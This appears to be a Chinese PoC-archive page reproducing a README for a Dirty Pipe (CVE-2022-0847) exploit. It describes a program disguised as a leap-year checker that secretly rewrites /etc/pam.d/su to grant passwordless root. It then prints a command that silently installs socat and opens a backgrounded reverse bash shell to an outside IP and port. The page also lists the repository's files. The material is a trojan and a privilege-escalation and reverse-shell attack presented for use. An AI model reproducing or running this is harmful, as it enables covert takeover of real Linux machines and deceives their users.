来源

关联漏洞

描述

Using CVE-2022-0847, "Dirty Pipe Exploit", to pop a reverse bash shell for arbitrary code execution on a foreign machine.

介绍

# CVE-2022-0847-Exploit-Implementation

This is a POC showing how to pop a reverse bash shell for arbitrary code execution on a foreign machine using CVE-2022-0847, "Dirty Pipe Exploit".
This vulnerability only affects Linux kernel versions 5.8 or newer but was patched in versions 5.16.11, 5.15.25, 5.10.102, and up. Update your kernel :)

This exploit was found by security researcher Max Kellermann. I will not go into the details of this exploit as he does far better than I can in his write-up here; https://dirtypipe.cm4all.com/

This proof of concept is seemingly a simple leap year program that will tell you if the given year is a leap year.
In the background, I change a line in `/etc/pam.d/s`
I change the line `auth	sufficient pam_rootok.so` to `auth	sufficient pam_permit.so` This change allows us to run commands as the superuser without entering a password.
After this, we can simply use C's `system()` function to execute commands as su.

I run 
```
su -c \"apt-get -y install socat\" > /dev/null; socat TCP4:172.23.46.133:4444 EXEC:/bin/bash & exit
```


This line installs socat to the system and directs the output to a null file so the user does not see the output of the download. Next, I execute a socat command to connect to a foreign machine with the specified ip and port.
The `&` puts this process into the background so that after the user closes the terminal the connection will still be held. 

Executing the program on a vulnerable machine: \
![Image of vulnerable machine](https://www.josephmilici.com/vulnerable.png)

Connecting to the vulnerable machine: \
![Image of foreign machine](https://www.josephmilici.com/foreign.png)

文件快照

 [4.0K]  /data/pocs/f753f757143bba439beb4c87b49b5c865890cd95
├── [4.4K]  leapyear.c
└── [1.6K]  README.md

0 directories, 2 files

备注